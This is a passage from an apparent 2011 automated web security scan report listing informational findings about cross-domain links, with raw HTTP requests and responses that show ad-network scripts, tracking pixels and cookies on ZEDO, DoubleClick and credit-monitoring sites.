document.write('<iframe src="http://view.atdmt.com/UNY/iview/312587473/direct/01/'+Math.random()+'?click=http://yads.zedo.com/ads2/c%3Fa=934861%3Bn=809%3Bx=1792%3Bc=809001050,809001050%3Bg=172%3Bi=51%3B1=2%3B2=1%3Bs=376%3Bg=172%3Bm=34%3Bw=51%3Bi=51%3Bu=9lO0TcGt89btIYJEUz5hJCkQ~042411%3Bk=" frameborder="0" scrolling="no" marginheight="0" marginwidth="0" topmargin="0" leftmargin="0" allowtransparency="true" width="160" height="600">');
document.write('<script language="JavaScript" type="text/javascript">
...[SNIP]...

23.233. http://d7.zedo.com/bar/v16-405/d3/jsc/fm.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-405/d3/jsc/fm.js

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /bar/v16-405/d3/jsc/fm.js?c=1050&a=0&f=&n=809&r=21&d=9&q=&$=&s=376&z=0.5751898586573593 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: d7.zedo.com
Cookie: FFcat=809,1050,7:809,1050,3:809,1050,9:809,1050,21; FFgeo=2241452; FFad=54:65:55:None; FFCap=1574B809,210132,210841,210128,204732,204731,210133,210175,210174,209524,208227,209522,208218,203040,207898,209526,207897,208226,210129,208216|2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:5,1,1:2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:0,1,1:2,1,1:2,1,1; ZEDOIDA=9lO0TcGt89btIYJEUz5hJCkQ~042411; ZEDOIDX=21

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFgeo=2241452;expires=Mon, 23 Apr 2012 16:51:05 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=809,1050,9:809,1050,7:809,1050,3:809,1050,21;expires=Mon, 25 Apr 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=56:54:65:None;expires=Mon, 25 Apr 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "426044b-838c-4a12b036d4100"
Vary: Accept-Encoding
X-Varnish: 920078456
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=153
Expires: Sun, 24 Apr 2011 16:53:38 GMT
Date: Sun, 24 Apr 2011 16:51:05 GMT
Connection: close
Content-Length: 2106

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var p9=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=376;var zzPat='';var zzC
...[SNIP]...
</span>")
document.write('<SCRIPT language=\'JavaScript1.1\' SRC="http://ad.doubleclick.net/adj/N5831.132349.1555557534521/B4835684.28;sz=300x250;click=http://yads.zedo.com/ads2/c?a=934268%3Bn=809%3Bx=2325%3Bc=809001050,809001050%3Bg=172%3Bi=56%3B1=2%3B2=1%3Bs=376%3Bg=172%3Bm=34%3Bw=51%3Bi=56%3Bu=9lO0TcGt89btIYJEUz5hJCkQ~042411%3Bk%3D;ord='+Math.random()+'?">');
document.write('<\/script>
...[SNIP]...

23.234. http://d7.zedo.com/bar/v16-405/d3/jsc/fm.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-405/d3/jsc/fm.js

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /bar/v16-405/d3/jsc/fm.js?c=1050&a=0&f=&n=809&r=21&d=7&q=&$=&s=376&z=0.5131433050553793 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: d7.zedo.com
Cookie: ZCBC=1; FFgeo=2241452; FFcat=809,1050,3:809,1050,9:809,1050,7:809,1050,21; FFad=8:8:4:0; ZEDOIDA=xlO0TcGt89Z-t7Q0A2jzc9p9~042411; ZEDOIDX=21; FFCap=1574B809,210841,210133,210132,204732,204731,210174|2,1,1:2,1,1:2,1,1:0,1,1:2,1,1:0,1,1

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFCap=1574B809,210841,210133,210132,204732,204731,210174,210128|2,1,1:2,1,1:2,1,1:0,1,1:2,1,1:0,1,1:0,1,1;expires=Tue, 24 May 2011 16:46:38 GMT;path=/;domain=.zedo.com;
Set-Cookie: FFcat=809,1050,7:809,1050,3:809,1050,9:809,1050,21;expires=Mon, 25 Apr 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=5:8:8:0;expires=Mon, 25 Apr 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "426044b-838c-4a12b036d4100"
Vary: Accept-Encoding
X-Varnish: 920078456
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=223
Expires: Sun, 24 Apr 2011 16:50:21 GMT
Date: Sun, 24 Apr 2011 16:46:38 GMT
Connection: close
Content-Length: 2690

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var p9=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=376;var zzPat='';var zzC
...[SNIP]...
</span>")
document.write('<iframe src="http://view.atdmt.com/UNY/iview/312587463/direct/01/'+Math.random()+'?click=http://yads.zedo.com/ads2/c%3Fa=931206%3Bn=809%3Bx=1792%3Bc=809001050,809001050%3Bg=172%3Bi=5%3B1=2%3B2=1%3Bs=376%3Bg=172%3Bm=34%3Bw=51%3Bi=5%3Bu=xlO0TcGt89Z-t7Q0A2jzc9p9~042411%3Bk=" frameborder="0" scrolling="no" marginheight="0" marginwidth="0" topmargin="0" leftmargin="0" allowtransparency="true" width="160" height="600">');
document.write('<script language="JavaScript" type="text/javascript">
...[SNIP]...

23.235. http://d7.zedo.com/bar/v16-405/d3/jsc/fm.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-405/d3/jsc/fm.js

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /bar/v16-405/d3/jsc/fm.js?c=1050&a=0&f=&n=809&r=21&d=9&q=&$=&s=376&z=0.5030563876652094 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: d7.zedo.com
Cookie: FFcat=809,1050,7:809,1050,3:809,1050,9:809,1050,21; FFgeo=2241452; FFad=34:35:34:None; FFCap=1574B809,210132,210841,210128,204732,204731,210133,210175,210174,209524,208227,209522,208218,203040,207898,209526,207897,208226,210129,208216|2,1,1:2,1,1:2,1,1:1,1,1:2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:5,1,1:2,1,1:2,1,1:2,1,1:1,1,1:1,1,1:2,1,1:0,1,1:2,1,1:1,1,1; ZEDOIDA=9lO0TcGt89btIYJEUz5hJCkQ~042411; ZEDOIDX=21

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFCap=1574B809,210132,210841,210128,204732,204731,210133,210175,210174,209524,208227,209522,208218,203040,207898,209526,207897,208226,210129,208216|2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:5,1,1:2,1,1:2,1,1:2,1,1:1,1,1:1,1,1:2,1,1:0,1,1:2,1,1:1,1,1;expires=Tue, 24 May 2011 16:49:21 GMT;path=/;domain=.zedo.com;
Set-Cookie: FFcat=809,1050,9:809,1050,7:809,1050,3:809,1050,21;expires=Mon, 25 Apr 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=35:34:35:None;expires=Mon, 25 Apr 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "426044b-838c-4a12b036d4100"
Vary: Accept-Encoding
X-Varnish: 920078456
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=61
Expires: Sun, 24 Apr 2011 16:50:22 GMT
Date: Sun, 24 Apr 2011 16:49:21 GMT
Connection: close
Content-Length: 2123

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var p9=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=376;var zzPat='';var zzC
...[SNIP]...
</span>")
document.write('<SCRIPT language=\'JavaScript1.1\' SRC="http://ad.doubleclick.net/adj/N3382.dogtimemedia.comOX6462/B5304363.9;sz=300x250;pc=[TPAS_ID];;click=http://yads.zedo.com/ads2/c?a=911256%3Bn=809%3Bx=2325%3Bc=809001050,809001050%3Bg=172%3Bi=35%3B1=2%3B2=1%3Bs=376%3Bg=172%3Bm=34%3Bw=51%3Bi=35%3Bu=9lO0TcGt89btIYJEUz5hJCkQ~042411%3Bo%3D20%3By%3D5%3Bv%3D1%3Bt%3Dr%3Bk%3D;ord='+Math.random()+'?">');
document.write('<\/script>
...[SNIP]...

23.236. http://d7.zedo.com/bar/v16-405/d3/jsc/fm.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-405/d3/jsc/fm.js

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /bar/v16-405/d3/jsc/fm.js?c=1050&a=0&f=&n=809&r=21&d=7&q=&$=&s=376&z=0.07120958635736857 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: d7.zedo.com
Cookie: ZCBC=1; FFgeo=2241452; FFcat=809,1050,3:809,1050,9:809,1050,7:809,1050,21; FFad=9:9:5:0; ZEDOIDA=xlO0TcGt89Z-t7Q0A2jzc9p9~042411; ZEDOIDX=21; FFCap=1574B809,210841,210133,210132,204732,204731,210174,210128|2,1,1:2,1,1:2,1,1:0,1,1:2,1,1:1,1,1:0,1,1

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFCap=1574B809,210841,210133,210132,204732,204731,210174,210128|2,1,1:2,1,1:2,1,1:0,1,1:2,1,1:1,1,1:1,1,1;expires=Tue, 24 May 2011 16:46:44 GMT;path=/;domain=.zedo.com;
Set-Cookie: FFcat=809,1050,7:809,1050,3:809,1050,9:809,1050,21;expires=Mon, 25 Apr 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=6:9:9:0;expires=Mon, 25 Apr 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "426044b-838c-4a12b036d4100"
Vary: Accept-Encoding
X-Varnish: 920078456
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=217
Expires: Sun, 24 Apr 2011 16:50:21 GMT
Date: Sun, 24 Apr 2011 16:46:44 GMT
Connection: close
Content-Length: 2694

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var p9=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=376;var zzPat='';var zzC
...[SNIP]...
</span>")
document.write('<iframe src="http://view.atdmt.com/UNY/iview/312587463/direct/01/'+Math.random()+'?click=http://yads.zedo.com/ads2/c%3Fa=931206%3Bn=809%3Bx=1792%3Bc=809001050,809001050%3Bg=172%3Bi=6%3B1=2%3B2=1%3Bs=376%3Bg=172%3Bm=34%3Bw=51%3Bi=6%3Bu=xlO0TcGt89Z-t7Q0A2jzc9p9~042411%3Bk=" frameborder="0" scrolling="no" marginheight="0" marginwidth="0" topmargin="0" leftmargin="0" allowtransparency="true" width="160" height="600">');
document.write('<script language="JavaScript" type="text/javascript">
...[SNIP]...

23.237. http://d7.zedo.com/bar/v16-405/d3/jsc/fm.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-405/d3/jsc/fm.js

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /bar/v16-405/d3/jsc/fm.js?c=1050&a=0&f=&n=809&r=21&d=7&q=&$=&s=376&z=0.7837170936814204 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: d7.zedo.com
Cookie: FFcat=809,1050,3:809,1050,9:809,1050,7:809,1050,21; FFgeo=2241452; FFad=69:59:57:None; FFCap=1574B809,210132,210841,210128,204732,204731,210133,210175,210174,209524,208227,209522,208218,203040,207898,209526,207897,208226,210129,208216|2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:5,1,1:2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:0,1,1:2,1,1:2,1,1; ZEDOIDA=9lO0TcGt89btIYJEUz5hJCkQ~042411; ZEDOIDX=21

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFad=58:69:59:None;expires=Mon, 25 Apr 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=809,1050,7:809,1050,3:809,1050,9:809,1050,21;expires=Mon, 25 Apr 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "426044b-838c-4a12b036d4100"
Vary: Accept-Encoding
X-Varnish: 920078456
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=142
Expires: Sun, 24 Apr 2011 16:53:39 GMT
Date: Sun, 24 Apr 2011 16:51:17 GMT
Connection: close
Content-Length: 2714

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var p9=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=376;var zzPat='';var zzC
...[SNIP]...
</span>")
document.write('<iframe src="http://view.atdmt.com/UNY/iview/312587473/direct/01/'+Math.random()+'?click=http://yads.zedo.com/ads2/c%3Fa=934861%3Bn=809%3Bx=1792%3Bc=809001050,809001050%3Bg=172%3Bi=58%3B1=2%3B2=1%3Bs=376%3Bg=172%3Bm=34%3Bw=51%3Bi=58%3Bu=9lO0TcGt89btIYJEUz5hJCkQ~042411%3Bk=" frameborder="0" scrolling="no" marginheight="0" marginwidth="0" topmargin="0" leftmargin="0" allowtransparency="true" width="160" height="600">');
document.write('<script language="JavaScript" type="text/javascript">
...[SNIP]...

23.238. http://dg.specificclick.net/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://dg.specificclick.net
Path:   /

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /?y=3&t=h&u=http%3A%2F%2Fwww.neudesicmediagroup.com%2FAdvertising.aspx%3Fsite%3DSilverlight&r= HTTP/1.1
Host: dg.specificclick.net
Proxy-Connection: keep-alive
Referer: http://www.neudesicmediagroup.com/Advertising.aspx?site=Silverlight
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: adp=7e-J^1^1; ug=wJ6hSWn821G3dA; smdmp=7e-J:811200901; adf=7e-J^0^0

Response

HTTP/1.1 200 OK
Server: WebStar 1.0
Cache-Control: no-store,no-cache,must-revalidate,post-check=0,pre-check=0
Pragma: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Set-Cookie: JSESSIONID=83adbd28d8ba1db9babff0e4ebc6; Path=/
Content-Type: text/html;charset=ISO-8859-1
Date: Sun, 24 Apr 2011 15:57:28 GMT
Vary: Accept-Encoding
Connection: Keep-Alive
Content-Length: 569

<html><body> <script> var _comscore = _comscore || []; _comscore.push({ c1: "8", c2: "2101" ,c3: "1234567891234567891" }); (function() { var s = document.createElement("script"), el = docume
...[SNIP]...
<noscript> <img src="http://b.scorecardresearch.com/p?c1=8&c2=2101&c3=1234567891234567891&c15=&cv=2.0&cj=1" /> </noscript>
...[SNIP]...

23.239. http://engine03.echomail.com/icomee-regs/trial/MonitoringTrial.jsp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://engine03.echomail.com
Path:   /icomee-regs/trial/MonitoringTrial.jsp

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /icomee-regs/trial/MonitoringTrial.jsp?m=2 HTTP/1.1
Host: engine03.echomail.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=F4978EDED768B0F757D9681D37B31DEC; Path=/icomee-regs
Content-Type: text/html;charset=UTF-8
Content-Language: en
Date: Mon, 25 Apr 2011 00:38:30 GMT
Content-Length: 20313


<script src="/icomee-regs/js/common.js"></script>
<script src="/icomee-regs/js/uitags.js"></script>
<script src="/icomee-regs/js/validation.js"></script>
<sc
...[SNIP]...
<td width="30"><img src="http://dremail.com/images/spacer.gif" alt="" width="1" border="0" height="1"></td>
...[SNIP]...
<td style="padding-bottom:0; padding-left:15px; vertical-align: bottom"><img src="http://www.dremail.com/images/spacer.gif" width="80" border="0"></td>
                                           <td width="55"><img src="http://dremail.com/images/spacer.gif" alt="" width="80" border="0" height="8"></td>
...[SNIP]...
<td width="5"><img src="http://dremail.com/images/spacer.gif" width="1" height="1" alt="" border="0"></td>
...[SNIP]...
<td width="5"><img src="http://dremail.com/images/spacer.gif" width="1" height="1" alt="" border="0"></td>
...[SNIP]...
<td ><img src="http://dremail.com/images/spacer.gif" width="1" height="1" alt="" border="0"></td>
...[SNIP]...
<td width="30"><img src="http://dremail.com/images/spacer.gif" alt=""
width="1" border="0" height="1">
</td>
...[SNIP]...

23.240. http://equifax.com/free30daytrial/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://equifax.com
Path:   /free30daytrial/

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /free30daytrial/?CMP=KNC-Google&HBX_PK=credit_monitoring_service&HBX_OU=50&gclid=CNf214_1tagCFeM85Qod4FaqEA HTTP/1.1
Host: equifax.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: hbx.hc2=CJ; hbx.hc3=null; hbx.timestamp=1303614816593

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Sun, 24 Apr 2011 19:53:06 GMT
Content-length: 13111
Content-type: text/html
Last-modified: Wed, 30 Mar 2011 22:21:05 GMT
Etag: "3337-4d93acd1"
Accept-ranges: bytes

<!DOCTYPE html>

<html lang="en">
<head>
<!-- META -->
<meta charset="utf-8">
<meta name="author" content="Equifax" />
<meta name="copyright" content="Equifax" />
<meta name="descripti
...[SNIP]...
<noscript>
<iframe src="http://fls.doubleclick.net/activityi;src=2716759;type=eclan538;cat=mjprn946;ord=1?" width="1" height="1" frameborder="0"></iframe>
...[SNIP]...
<!-- End Google Analytics Tag -->

<script src="http://equfx.netmng.com/?aid=089&tax=search" type="text/javascript" defer="defer"></script>
...[SNIP]...

23.241. http://fls.doubleclick.net/activityi  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://fls.doubleclick.net
Path:   /activityi

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /activityi;src=1883957;type=nonse241;cat=homep792;ord=1;num=5926853162236.512? HTTP/1.1
Host: fls.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.creditchecktotal.com/default.aspx?sc=668032&bcd=TotalCompare
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
X-Frame-Options: ALLOWALL
Server: Floodlight
Date: Sun, 24 Apr 2011 20:44:35 GMT
Expires: Sun, 24 Apr 2011 20:44:35 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
Content-Type: text/html
X-XSS-Protection: 1; mode=block
Content-Length: 935

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html><head><title></title></head><body style="background-color: transparent"><img src="http://bh.contextweb.com/bh/set.aspx?action=add&advid=1697&token=FCRT1" width="1" height="1" border="0"><img src="http://ad.doubleclick.net/activity;src=2055485;dcnet=4845;boom=37225;sz=1x1;ord=1?"width="1" height="1" border="0" alt=""><img src="http://media.fastclick.net/w/tre?ad_id=23179;evt=15998;cat1=19287;cat2=19288;rand=[CACHEBUSTER]" width="1" height="1" border="0"><img src="http://ad.yieldmanager.com/pixel?id=126728&t=2" width="1" height="1" /><img border="0" hspace="0" vspace="0" width="1" height="1" src="http://stats.adbrite.com/stats/stats.gif?_uid=218171&_pid=7013" /><img border="0" hspace="0" vspace="0" width="1" height="1" src="http://bstats.adbrite.com/click/bstats.gif?kid=44888252&bapid=5555&uid=730083" /></body>
...[SNIP]...

23.242. http://fls.doubleclick.net/activityi  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://fls.doubleclick.net
Path:   /activityi

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /activityi;src=2769103;type=tui-t329;cat=truec214;ord=1;num=9268942088820.041? HTTP/1.1
Host: fls.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.truecredit.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
X-Frame-Options: ALLOWALL
Server: Floodlight
Date: Mon, 25 Apr 2011 00:34:25 GMT
Expires: Mon, 25 Apr 2011 00:34:25 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
Content-Type: text/html
X-XSS-Protection: 1; mode=block
Content-Length: 2855

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html><head><title></title></head><body style="background-color: transparent"><IMG SRC="http://bp.specificclick.net?pixid=99003145 " width=0 height=0 border=0><img src="http://media.fastclick.net/w/tre?ad_id=21871;evt=14608;cat1=17033;cat2=17034;rand=7069007" width="1" height="1" border="0"><img src="http://idcs.interclick.com/Segment.aspx?sid=4318baf9-76a8-4375-a570-ccc64464b1df"/><!-- Google Code for Unsecure Remarketing List Remarketing List -->
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.googleadservices.com/pagead/conversion.js">
</script>
...[SNIP]...
<div style="display:inline;">
<img height="1" width="1" style="border-style:none;" alt="" src="http://www.googleadservices.com/pagead/conversion/1026960077/?label=MhkHCK3vqgEQzdXY6QM&amp;guid=ON&amp;script=0"/>
</div>
</noscript><img src="http://leadback.advertising.com/adcedge/lb?site=695501&srvc=1&betr=truecreditvisited_cs=1&betq=11502=422657" width = "1" height = "1" border = "0"><img src="http://action.mathtag.com/mm//TRAN//red?nm=TrueCHPg&s0=&s1=&s2=&v0=&v1=&v2=&ri=7069007" width="1" height="1" />
<img src='http://pixel.mathtag.com/event/img?mt_id=102651&mt_adid=100461&v1=&v2=&v3=&s1=&s2=&s3=&ord=7069007' width='1' height='1' />
<img src="http://ad.yieldmanager.com/pixel?id=1209622&id=1209619&id=314297&t=2" width="1" height="1" />
<!-- Advertiser 'TransUnion Interactive', Include user in segment 'Truecredit Site Retargeting Pixel created 5.10.10' - DO NOT MODIFY THIS PIXEL IN ANY WAY -->
<img src="http://ads.bluelithium.com/pixel?id=769409&t=2" width="1" height="1" />
<!-- End of segment tag --><img src="http://www.burstnet.com/enlightn/6249//EA4E/" width="0" height="0" border="0"><img src='http://a.tribalfusion.com/i.cid?c=350803&d=30&page=landingPage' width='1' height='1' border='0'><img src="http://bh.contextweb.com/bh/set.aspx?action=add&advid=2354&token=ZETC1" width="1" height="1" border="0"><img src="http://b.collective-media.net/seg/rt/truecredit2" width="1" height="1" /><script src="https://segment-pixel.invitemedia.com/pixel?pixelID=57305&pixelID=57306&pixelID=57307&pixelID=57308&pixelID=57309&pixelID=57310&pixelID=57311&partnerID=272&clientID=5399&key=segment&returnType=js"></script>
<noscript>
<img src="https://segment-pixel.invitemedia.com/pixel?pixelID=57305&pixelID=57306&pixelID=57307&pixelID=57308&pixelID=57309&pixelID=57310&pixelID=57311&partnerID=272&clientID=5399&key=segment" width="1" height="1" />
</noscript>
...[SNIP]...

23.243. http://fls.doubleclick.net/activityi  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://fls.doubleclick.net
Path:   /activityi

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /activityi;src=2716759;type=eclan538;cat=mjprn946;ord=243834410794.0793? HTTP/1.1
Host: fls.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://equifax.com/free30daytrial/?CMP=KNC-Google&HBX_PK=credit_monitoring_service&HBX_OU=50&gclid=CNf214_1tagCFeM85Qod4FaqEA
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
X-Frame-Options: ALLOWALL
Server: Floodlight
Date: Sun, 24 Apr 2011 19:54:03 GMT
Expires: Sun, 24 Apr 2011 19:54:03 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
Content-Type: text/html
X-XSS-Protection: 1; mode=block
Content-Length: 340

